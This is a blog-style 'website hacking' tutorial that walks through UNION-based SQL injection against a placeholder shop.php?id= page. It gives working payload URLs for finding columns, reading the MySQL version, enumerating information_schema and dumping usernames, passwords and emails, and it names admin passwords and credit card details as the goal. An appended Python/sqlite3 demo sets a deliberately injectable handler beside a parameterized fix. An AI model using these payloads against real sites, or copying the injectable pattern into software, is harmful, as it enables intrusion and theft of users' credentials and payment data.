WebSite Hacking Full Tutorial

16 Nov

There are a couple of ways to hack into a website:

1. SQL injection
2. RFI
3. LFI
4. XSS
5. Other ways

SQL injection is the most famous of these, so I will teach you about SQL injection with pics!

SQL Injection

What is SQL Injection?

Put very simply, when you inject a site you can get:

Admin user name (root)
Admin password (root)
Other admins' passwords
Every user name
Every user password
Credit card info (every detail)

How to find out whether a site is vulnerable

Let's say I have a site:

Code:

http://www.website.com/shop.php?id=10

To see whether it is hackable or not, put ' at the end, so it should look like:

Code:

http://www.website.com/shop.php?id=10'

If that gives you a MySQL error, the site is hackable.

OK, the next step:

Now that we know whether the site is vulnerable or not, we have to get through these steps to hack into the admin account:

1. Finding the number of columns
2. Check if UNION works
3. Looking for a visible column
4. Check if the version is > 5
5. Extracting table names, column names, etc. (or bruteforcing if the version is < 5)
6. Forming the finishing query to extract our required information

Finding the number of columns

Code:

http://www.Site.com/shop.php?id=10+order+by+1--

(You should not get any error)

Code:

http://www.Site.com/shop.php?id=10+order+by+10000--

(You should get an error)

If you get an error, the next step is to find the exact number of columns:

Code:

http://www.Site.com/shop.php?id=10+order+by+2--
http://www.Site.com/shop.php?id=10+order+by+3--
http://www.Site.com/shop.php?id=10+order+by+4--
http://www.Site.com/shop.php?id=10+order+by+5--
http://www.Site.com/shop.php?id=10+order+by+6--
http://www.Site.com/shop.php?id=10+order+by+7-- <-- Keep injecting until you get an error; for me it's at order by 7 in my pic

Check if UNION works

So now we know our site has 6 columns. What you should do now is put them in a UNION query like this:

Code:

http://www.Site.com/shop.php?id=-10+Union+Select+1,2,3,4,5,6--

Looking for a visible column

Now you should see a number somewhere on the screen. For me it's 2 (it's highlighted).

Check if the version is > 5

Now we need to check if the version is > 5 (VERY VERY IMPORTANT STEP).
For this, I pick our visible column, in this case 2, and replace it with @@version.

For example:

Code:

http://www.Site.com/shop.php?id=-10+Union+Select+1,@@version,3,4,5,6--

Now you will be able to see the MySQL version, like this:

You should FIRST CHECK IF IT IS GREATER THAN 5.
If it is, you can proceed; if it's below version 5, you HAVE TO GUESS THE TABLE NAMES.
Extracting table names, column names, etc…

Now we must get:
1. Database names
2. Table names
3. Column names

Database names:

Now this is the confusing part, so stay with me.

Now we are going to get the database name and the user all together, since we know the visible column.

Code:

http://www.Site.com/shop.php?id=-10+Union+Select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6--

Many people get confused by concat_ws. It means "concat with separator", and the separator we use is given at the start of the function call. Here I used 0x3a, which is the hex for ":". The purpose of this is getting the output in the format we want it in. (copied)

Now let's see what these are:
version() : returns the version of MySQL used on the server
user() : returns the MySQL user the application is connected as
database() : returns the current database name
That will give you something like this:

Grab the database using information_schema

Code:

http://www.website.com/shop.php?id=1+UNION+SELECT+1,group_concat(schema_name),3,4,5,6+from+information_schema.schemata--

What is this?
1. +from+information_schema.schemata : returns the databases on the server
We may get several database names, depending on the number of databases present.
If you get something like this:

Sigma is the database name.

Extracting table names:
Now we know the database name. What we need now is the MySQL table names.
I've picked the database 'users' to extract our table names.
We have to use the database information_schema, the table tables and the column table_name to extract the respective table names.
So it should look like:
Code:

http://www.Site.com/shop.php?id=1+UNION+SELECT+1,group_concat(table_name),3,4,5,6+from+information_schema.tables--

This will give you more than we need, like every junk DB on the server.

We only need the tables of the database users, so now we go with:
Code:

http://www.Site.com/shop.php?id=1+UNION+SELECT+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+table_schema='users'--

If it doesn't respond properly, sometimes you have to hex the string 'users'; hexed, 'users' becomes 0x7573657273 (a hex literal is not quoted).
So it should look like:
http://www.Site.com/shop.php?id=1+UNION+SELECT+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+table_schema=0x7573657273--
Now you should get a table name. I'll take the table USERS for example.

Column names:
Now we are going to get the data from the table named "USERS" by extracting its various columns.
Code:

www.Site.com/shop.php?id=10+UNION+SE … olumn_name),3,4,5,6+from+information_schema.columns+where+table_name='USERS'--

In that I have changed group_concat(table_name) to group_concat(column_name), because now we are looking for columns.
column_name extracts all column names present in the table.
And add this to the end of the query:
+from+information_schema.columns+where+table_name='USERS'--
It will show you the columns. Let's say the columns are username, password and email.
Code:

http://www.website.com/shop.php?id=10+UNION+SELECT+1,concat_ws(0x3a,username,password,email),3,4,5,6+from+USERS--
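As an added example (not part of the original post), here is a constructed Python/sqlite3 stand-in for the shop.php?id= lookup described above: the string-concatenating handler reacts to the quote and order by probes exactly as the walkthrough says, while the bound-parameter handler never lets the parameter reach the SQL parser as code. The table layout, handler names and the users row are all made up for the demo.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the shop backend: six columns, as in the post.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE shop (id INTEGER, name TEXT, price REAL, stock INTEGER, sku TEXT, vendor TEXT);
        INSERT INTO shop VALUES (10, 'Widget', 9.99, 5, 'W-10', 'Acme');
        CREATE TABLE users (username TEXT, password TEXT, email TEXT);
        INSERT INTO users VALUES ('admin', 'sample-hash', 'admin@example.test');
    """)
    return conn


def lookup_vulnerable(conn, raw_id):
    # The id parameter is pasted into the SQL text, so anything after the number
    # is parsed as SQL: a stray quote is a syntax error, ORDER BY / UNION are honoured.
    sql = "SELECT id, name, price, stock, sku, vendor FROM shop WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, raw_id):
    # Fix: validate the type, then bind with a placeholder. The value is sent as
    # data, so the probes from the post never change the statement's structure.
    if not raw_id.isdigit():
        raise ValueError("id must be an integer")
    sql = "SELECT id, name, price, stock, sku, vendor FROM shop WHERE id=?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def probe(handler, raw_id):
    """Classify a request the way the post (or a log reviewer) would:
    'rows', 'empty', 'error' (database error leaked) or 'rejected' (input validation)."""
    try:
        rows = handler(make_db(), raw_id)
    except sqlite3.Error:
        return "error"
    except ValueError:
        return "rejected"
    return "rows" if rows else "empty"
```

Run the probes from the walkthrough through both handlers: the vulnerable one errors on the quote and on "order by 7" (one past the six real columns), which is the tell the post describes; the hardened one rejects them before any SQL runs.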
